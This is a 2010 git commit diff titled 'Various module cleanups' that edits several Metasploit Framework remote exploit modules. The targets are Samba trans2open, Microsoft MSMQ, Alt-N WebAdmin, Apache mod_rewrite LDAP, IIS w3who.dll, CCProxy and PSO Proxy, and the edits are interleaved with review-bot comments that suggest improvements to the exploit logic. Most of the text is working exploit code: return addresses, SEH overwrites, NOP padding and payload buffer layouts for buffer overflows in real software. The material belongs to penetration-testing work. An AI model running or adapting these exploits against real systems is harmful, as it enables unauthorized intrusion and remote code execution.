Various module cleanups

git-svn-id: file:///home/svn/framework3/trunk@8498 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2010-02-15 00:48:03 +00:00
parent f9ae031055
commit 5d7139ad6f
11 changed files with 183 additions and 191 deletions


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,13 +19,13 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::SMB
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Samba trans2open Overflow (Mac OS X)',
'Description' => %q{
This exploits the buffer overflow found in Samba versions
2.2.0 to 2.2.8. This particular module is capable of
exploiting the bug on Mac OS X PowerPC systems.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
@ -33,8 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2003-0201'],
[ 'OSVDB', '4469'],
[ 'BID', '7294'],
[ 'URL', 'http://www.digitaldefense.net/labs/advisories/DDI-1013.txt'],
[ 'BID', '7294']
],
'Privileged' => true,
@ -47,14 +46,14 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Platform' => 'osx',
'Arch' => ARCH_PPC,
'Targets' =>
'Targets' =>
[
['Stack Brute Force', { 'Rets' => [0xbffffdfc, 0xbfa00000, 512] } ],
],
'DisclosureDate' => 'Apr 7 2003',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(139)
@ -75,10 +74,10 @@ class Metasploit3 < Msf::Exploit::Remote
connect
smb_login
# 1988 is required for findrecv shellcode
pattern = rand_text_english(1988)
# This stream covers the framepointer and the return address
pattern[1195, 64] = [curr_ret].pack('N') * 16
@ -97,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
sock.put(trans)
handler
disconnect
rescue EOFError
rescue => e
print_status("Caught exception: #{e}")
@ -107,3 +106,4 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
end
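Review bot: The new `rescue => e` that replaces `rescue EOFError` now catches every StandardError, so a NoMethodError or TypeError raised inside the brute-force body is reported as an ordinary status line and the loop presumably carries on to the next address as if the connection had dropped. I would report it with `print_error("Caught exception: #{e.class}: #{e}")` so the exception class is visible, and keep a `rescue EOFError` clause ahead of it for the expected connection-drop case so that anything else is clearly distinguishable in the log. The enclosing method starts and ends outside the hunk.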


@ -101,12 +101,12 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class)
end
# Need to perform target detection
def autofilter
false
end
def brute_exploit(target_addrs)
if(not @nops)
@ -221,3 +221,4 @@ class Metasploit3 < Msf::Exploit::Remote
end


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -20,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Microsoft Message Queueing Service Path Overflow',
'Description' => %q{
This module exploits a stack overflow in the RPC interface
@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
hostname, so this must be provided via the 'HNAME' option.
Much thanks to snort.org and Jean-Baptiste Marchand's
excellent MSRPC website.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
'StackAdjustment' => -3500,
},
'Targets' =>
'Targets' =>
[
[
'Windows 2000 ALL / Windows XP SP0-SP1 (English)',
@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'DisclosureDate' => 'Apr 12 2005',
'DefaultTarget' => 0))
# Change the default port values to point at MSMQ
register_options(
[
@ -74,21 +74,21 @@ class Metasploit3 < Msf::Exploit::Remote
# Common vulnerability scanning tools report port 445/139
# due to how they test for the vulnerability. Remap this
# back to 2103 for automated exploitation
rport = datastore['RPORT'].to_i
if ( rport == 2103 or rport == 2103 )
if ( rport == 445 or rport == 139 )
datastore['RPORT'] = 2103
end
# The NetBIOS hostname is required to exploit this bug reliably.
if (not datastore['HNAME'])
# XXX automatically determine the hostname
return false
end
true
end
def exploit
# MSMQ supports three forms of queue names, the two we can use are
@ -121,13 +121,13 @@ class Metasploit3 < Msf::Exploit::Remote
connect
print_status("Trying target #{target.name}...")
handle = dcerpc_handle('fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
stubdata =
stubdata =
NDR.long(1) +
NDR.long(1) +
NDR.long(1) +
@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
NDR.UnicodeConformantVaryingStringPreBuilt(queue_path)
print_status('Sending exploit ...')
response = dcerpc.call(9, stubdata)
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
@ -157,3 +157,4 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
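Review bot: The corrected port check `if ( rport == 445 or rport == 139 )` uses `or`, which binds looser than `||` and is the usual precedence trap in Ruby; `if [445, 139].include?(rport)` says the same thing without it, and the identical line appears again in the DNS-name MSMQ module further down this commit. The remap then silently overwrites the operator's RPORT, so a `print_status("Remapping RPORT #{rport} to 2103")` before `datastore['RPORT'] = 2103` would make the rewrite visible in the session log. Lower in the file, `if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)` reads more simply as `if dcerpc.last_response && dcerpc.last_response.stub_data`. The method containing the port remap begins outside the hunk.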


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -20,16 +20,16 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Microsoft Message Queueing Service DNS Name Path Overflow',
'Description' => %q{
This module exploits a stack overflow in the RPC interface
to the Microsoft Message Queueing service. This exploit requires
the target system to have been configured with a DNS name and
for that name to be supplied in the 'DNAME' option. This name does
not need to be served by a valid DNS server, only configured on
not need to be served by a valid DNS server, only configured on
the target machine.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'OSVDB', '39123'],
[ 'MSB', 'MS07-065'],
],
'Privileged' => true,
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
'StackAdjustment' => -3500,
},
'Targets' =>
'Targets' =>
[
[
'Windows 2000 Server English',
@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'DisclosureDate' => 'Dec 11 2007',
'DefaultTarget' => 0))
# Change the default port values to point at MSMQ
register_options(
[
@ -73,65 +73,65 @@ class Metasploit3 < Msf::Exploit::Remote
# Common vulnerability scanning tools report port 445/139
# due to how they test for the vulnerability. Remap this
# back to 2103 for automated exploitation
rport = datastore['RPORT'].to_i
if ( rport == 2103 or rport == 2103 )
if ( rport == 445 or rport == 139 )
datastore['RPORT'] = 2103
end
# The NetBIOS hostname is required to exploit this bug
if (not datastore['DNAME'])
# XXX automatically determine the hostname
return false
end
true
end
def exploit
connect
print_status("Trying target #{target.name}...")
handle = dcerpc_handle('fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
dname = datastore['DNAME']
boom = rand_text_alphanumeric(4096)
hname,domain = dname.split(".")
if(not domain)
print_status("The DNAME parameter specified is not valid.")
print_status("This option must be the fully-qualified domain name of the target (as it has been configured).")
return
end
off = 310 - (hname.length * 2)
seh = generate_seh_payload(target.ret)
boom[off, seh.length] = seh
buff = Rex::Text.to_unicode("#{dname}\\")
buff << boom
buff << "\x00\x00"
# Data alignment
while(buff.length % 4 != 0)
buff << "\x00"
end
stubdata =
stubdata =
NDR.long(1) + # [in] long arg_1,
NDR.UnicodeConformantVaryingStringPreBuilt(buff) + # [in][string] wchar_t * arg_2,
NDR.long(0) * 5 # ... fields we can ignore
print_status('Sending exploit...')
begin
begin
response = dcerpc.call(6, stubdata)
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Error: The wrong value has been supplied for the DNAME parameter")
print_status("This value must be the fully-qualified domain name of the target")
print_status("Many systems have no FQDN configured and cannot be exploited")
else
else
print_status("An unknown response was received from the server:")
print_status(">> " + dcerpc.last_response.stub_data.unpack("H*")[0])
end
@ -148,9 +148,10 @@ class Metasploit3 < Msf::Exploit::Remote
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
print_status("No response from the DCERPC service (this is usually a good thing).")
end
handler
disconnect
end
end
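Review bot: The DNAME validation failure is reported with `print_status` (`"The DNAME parameter specified is not valid."` and the line after it), whereas the equivalent branches in the WebAdmin and w3who modules of this same commit use `print_error`; switching these two calls to `print_error` keeps the operator-facing severity consistent across the modules. Also, `hname,domain = dname.split(".")` keeps only the first two labels, so `domain` is merely the second label and `if(not domain)` only checks that a dot is present; `unless dname.include?('.')` states that intent directly, with `hname = dname.split('.').first` for the offset calculation. The `exploit` method ends outside the first hunk.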


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Alt-N WebAdmin USER Buffer Overflow',
'Description' => %q{
Alt-N WebAdmin is prone to a buffer overflow condition. This
@ -51,51 +51,52 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Platform' => 'win',
'Targets' =>
'Targets' =>
[
['Automatic', {}],
['WebAdmin 2.0.4 Universal', { 'Ret' => 0x10074d9b }], # 2.0.4 webAdmin.dll
['WebAdmin 2.0.3 Universal', { 'Ret' => 0x10074b13 }], # 2.0.3 webAdmin.dll
['WebAdmin 2.0.2 Universal', { 'Ret' => 0x10071e3b }], # 2.0.2 webAdmin.dll
['WebAdmin 2.0.1 Universal', { 'Ret' => 0x100543c2 }], # 2.0.1 webAdmin.dll
['WebAdmin 2.0.1 Universal', { 'Ret' => 0x100543c2 }], # 2.0.1 webAdmin.dll
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 24 2003'))
register_options([Opt::RPORT(1000)], self.class)
end
# Identify the target based on the WebAdmin version number
def autofilter
res = send_request_raw({
'uri' => '/WebAdmin.DLL'
}, -1)
if (res and res.body =~ /WebAdmin.*v(2\..*)$/)
case $1
when /2\.0\.4/
datastore['TARGET'] = 0
when /2\.0\.3/
datastore['TARGET'] = 1
when /2\.0\.2/
datastore['TARGET'] = 2
when /2\.0\.1/
datastore['TARGET'] = 3
else
return false
end
return true
end
# Not vulnerable
return false
end
def exploit
mytarget = target
if (target.name =~ /Automatic/)
res = send_request_raw({
'uri' => '/WebAdmin.DLL'
}, -1)
if (res and res.body =~ /WebAdmin.*v(2\..*)$/)
case $1
when /2\.0\.4/
mytarget = targets[1]
when /2\.0\.3/
mytarget = targets[2]
when /2\.0\.2/
mytarget = targets[3]
when /2\.0\.1/
mytarget = targets[4]
else
print_error("No target found for v#{$1}")
return
end
else
print_error("No target found")
end
end
user_cook = rand_text_alphanumeric(2)
post_data = 'User=' + make_nops(168) + [target.ret].pack('V') + payload.encoded
post_data = 'User=' + make_nops(168) + [mytarget.ret].pack('V') + payload.encoded
post_data << '&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In'
print_status("Sending request...")
res = send_request_cgi({
'uri' => '/WebAdmin.DLL',
@ -104,15 +105,16 @@ class Metasploit3 < Msf::Exploit::Remote
'content-type' => 'application/x-www-form-urlencoded',
'cookie' => "User=#{user_cook}; Lang=en; Theme=standard",
'data' => post_data,
'headers' =>
'headers' =>
{
'Accept' => 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png',
'Accept-Language' => 'en',
'Accept-Charset' => 'iso-8859-1,*,utf-8'
}
}, 5)
handler
end
end
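Review bot: In the new version-detection block of `exploit`, the `else` branch's `print_error("No target found for v#{$1}")` will print an empty version: by the time that branch runs every `when /2\.0\.x/` test has failed, and a failed Regexp match resets `$~`, so `$1` is nil. Capture the match first — `version = $1` directly after the `if (res and res.body =~ ...)` line — then `case version` and `#{version}` in the message. The outer `print_error("No target found")` branch also does not `return`, so `mytarget` stays at the Automatic entry (whose options hash has no 'Ret') and `[mytarget.ret].pack('V')` presumably fails with a TypeError instead of the clear message just printed; add `return` after it, and the same applies to the `print_error("No valid target found")` branch in the w3who module of this commit.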


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Apache module mod_rewrite LDAP protocol Buffer Overflow',
'Description' => %q{
This module exploits the mod_rewrite LDAP protocol scheme handling
@ -26,8 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote
Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.
This module requires REWRITEPATH to be set accurately. In addition,
the target must have 'RewriteEngine on' configured, with a specific
'RewriteRule' condition enabled to allow for exploitation.
'RewriteRule' condition enabled to allow for exploitation.
The flaw affects multiple platforms, however this module currently
only supports Windows based installations.
},
@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
'StackAdjustment' => -3500,
'DisableNops' => 'True',
},
'Targets' =>
'Targets' =>
[
[ 'Automatic', {} ], # patrickw tested OK 20090310 win32
],
@ -69,16 +69,13 @@ class Metasploit3 < Msf::Exploit::Remote
OptString.new('REWRITEPATH', [true, "The mod_rewrite URI path", "rewrite_path"]),
], self.class)
end
def autofilter
return false
end
def check
res = send_request_raw({
'uri' => '/',
'version' => '1.1',
}, 2)
'uri' => '/',
'version' => '1.1',
}, 2)
if (res.to_s =~ /Apache/) # This could be smarter.
return Exploit::CheckCode::Detected
@ -88,10 +85,10 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
# On Linux Apache, it is possible to overwrite EIP by
# sending ldap://<buf> ... TODO patrickw
trigger = '/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90'
print_status("Sending payload.")
@ -102,3 +99,4 @@ class Metasploit3 < Msf::Exploit::Remote
handler
end
end
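Review bot: Dropping the `def autofilter; return false; end` override is a semantic change rather than a cleanup: the module now returns whatever `Msf::Exploit::Remote` supplies for `autofilter`, which presumably no longer opts it out of automated module selection. The same removal happens in the sections starting at the `@ -70,10 +70,6`, `@ -63,29 +63,26`, `@ -57,31 +57,27` and `@ -68,22 +68,19` hunks below. A sentence in the commit message saying why these overrides are no longer wanted would help anyone later bisecting a change in automated behaviour.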


@ -70,10 +70,6 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class)
end
def autofilter
false
end
def check
connect
@ -120,4 +116,5 @@ class Metasploit3 < Msf::Exploit::Remote
def wfs_delay
25
end
end
end


@ -54,8 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'Windows XP Pro SP2 English', { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll
],
'Privileged' => false,
'DisclosureDate' => 'Feb 20 2004',
'DefaultTarget' => 0))
'DisclosureDate' => 'Feb 20 2004'
))
register_options(
[
@ -63,29 +63,26 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class)
end
def autofilter
false
end
def check
connect
sock.put("GET / HTTP/1.0\r\n\r\n")
banner = sock.get(-1,3)
if (banner =~ /PSO Proxy 0\.9/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
exploit = rand_text_alphanumeric(1024, payload_badchars)
exploit += [target['Ret']].pack('V') + payload.encoded
sock.put(exploit + "\r\n\r\n")
disconnect
handler
def check
connect
sock.put("GET / HTTP/1.0\r\n\r\n")
banner = sock.get(-1,3)
if (banner =~ /PSO Proxy 0\.9/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
exploit = rand_text_alphanumeric(1024, payload_badchars)
exploit += [target['Ret']].pack('V') + payload.encoded
sock.put(exploit + "\r\n\r\n")
disconnect
handler
end
end
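Review bot: `check` opens a socket with `connect` and returns from both the `Vulnerable` and `Safe` paths without `disconnect`, so the connection is left open until the framework cleans it up; the CCProxy module in this same commit shows the intended pattern with `disconnect` right after reading the banner. A `disconnect` after `banner = sock.get(-1,3)` (or an `ensure` clause around the body) would close it on every path. `banner =~ /PSO Proxy 0\.9/` tolerates a nil banner, so nothing is needed there.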


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Microsoft IIS ISAPI w3who.dll Query String Overflow',
'Description' => %q{
This module exploits a stack overflow in the w3who.dll ISAPI
@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
Windows 2000 and Windows XP (SP2). When exploiting Windows
XP, the payload must call RevertToSelf before it will be
able to spawn a command shell.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
@ -55,61 +55,61 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Platform' => 'win',
'Targets' =>
'Targets' =>
[
['Automatic Detection', { }],
['Windows 2000 RESKIT DLL [Windows 2000]', { 'Rets' => [ 48, 0x01169f4a ] }], # pop, pop, ret magic
['Windows 2000 RESKIT DLL [Windows XP]', { 'Rets' => [ 748, 0x10019f4a ] }], # pop, pop, ret magic
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 6 2004'))
register_options(
[
OptString.new('URL', [ true, "The path to w3who.dll", "/scripts/w3who.dll" ]),
], self.class)
end
# Identify the target based on the IIS version
def autofilter
res = send_request_raw({
'uri' => datastore['URL']
}, -1)
# Was a vulnerable system detected?
if (res and res.body =~ /Access Token/)
case res.headers['Server']
when /5\.1/
datastore['TARGET'] = 1
else
datastore['TARGET'] = 0
end
return true
end
# Not vulnerable
return false
end
def check
res = send_request_raw({
'uri' => datastore['URL']
}, -1)
if (res and res.body =~ /Access Token/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
mytarget = target
if(mytarget.name =~ /Automatic/)
res = send_request_raw({
'uri' => datastore['URL']
}, -1)
# Was a vulnerable system detected?
if (res and res.body =~ /Access Token/)
case res.headers['Server']
when /5\.1/
mytarget = targets[2]
else
mytarget = targets[1]
end
else
print_error("No valid target found")
end
end
buf = rand_text_english(8192, payload_badchars)
buf[target['Rets'][0] - 4, 4] = make_nops(2) + "\xeb\x04"
buf[target['Rets'][0] - 0, 4] = [ target['Rets'][1] ].pack('V')
buf[target['Rets'][0] + 4, 4] = "\xe9" + [-641].pack('V')
buf[target['Rets'][0] - 4 - payload.encoded.length, payload.encoded.length] = payload.encoded
buf[mytarget['Rets'][0] - 4, 4] = make_nops(2) + "\xeb\x04"
buf[mytarget['Rets'][0] - 0, 4] = [ mytarget['Rets'][1] ].pack('V')
buf[mytarget['Rets'][0] + 4, 4] = "\xe9" + [-641].pack('V')
buf[mytarget['Rets'][0] - 4 - payload.encoded.length, payload.encoded.length] = payload.encoded
print_status("Sending request...")
r = send_request_raw({
'uri' => datastore['URL'],
@ -120,3 +120,4 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
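Review bot: The `/Access Token/` probe and the `Server`-header version test are now written twice, once in `check` and once in the new Automatic branch of `exploit`, and the two copies can drift apart (they already differ in how a miss is handled). A private `detect_target` helper that issues the request and returns the matching `targets` entry or nil, called from both `check` and `exploit`, would keep a single copy of the detection logic and give `check` and `exploit` the same answer for the same response. The `exploit` method ends outside the hunk.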


@ -3,10 +3,10 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# http://metasploit.com/framework/
##
require 'msf/core'
@ -14,11 +14,11 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
def initialize(info = {})
super(update_info(info,
'Name' => 'CCProxy <= v6.2 Telnet Proxy Ping Overflow',
'Description' => %q{
This module exploits the YoungZSoft CCProxy <= v6.2 suite
@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote
long address to the 'ping' command.
},
'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ],
'Arch' => [ ARCH_X86 ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
@ -35,14 +35,14 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'OSVDB', '11593' ],
[ 'BID', '11666 ' ],
[ 'URL', 'http://milw0rm.com/exploits/621' ],
],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
{
'Space' => 1012,
'BadChars' => "\x00\x07\x08\x0a\x0d\x20",
},
@ -57,31 +57,27 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'Windows XP SP2 - English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll
],
'DisclosureDate' => 'Nov 11 2004'))
register_options(
[
Opt::RPORT(23),
], self.class)
end
def autofilter
false
end
def check
def check
connect
banner = sock.get_once(-1,3)
disconnect
if (banner =~ /CCProxy Telnet Service Ready/)
return Exploit::CheckCode::Appears
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
connect
sploit = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)
sock.put(sploit + "\r\n")
@ -90,3 +86,4 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
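Review bot: The reference entry `[ 'BID', '11666 ' ]` carries a trailing space inside the string literal, which the whitespace cleanup leaves untouched because it is part of the value; any reference link built from it would presumably include the space. Trim it to `[ 'BID', '11666' ],`. It is a context line of the `@ -35,14 +35,14` hunk, so it is a separate one-line fix rather than part of this change.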


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -27,8 +27,8 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ],
'Version' => '$Revision$',
'References' =>
[
'References' =>
[
['CVE', '2006-6184'],
['OSVDB', '11350'],
['BID', '21320'],
@ -68,22 +68,19 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class)
end
def autofilter
false
end
def exploit
connect_udp
sploit = "\x00\x02" + make_nops(25 - datastore['LHOST'].length)
sploit << payload.encoded
sploit << [target['Ret']].pack('V') # <-- eip = jmp esp. we control it.
sploit << "\x83\xc4\x28\xc3" # <-- esp = add esp 0x28 + retn
sploit << "\x00" + "netascii" + "\x00"
udp_sock.put(sploit)
disconnect_udp
end
end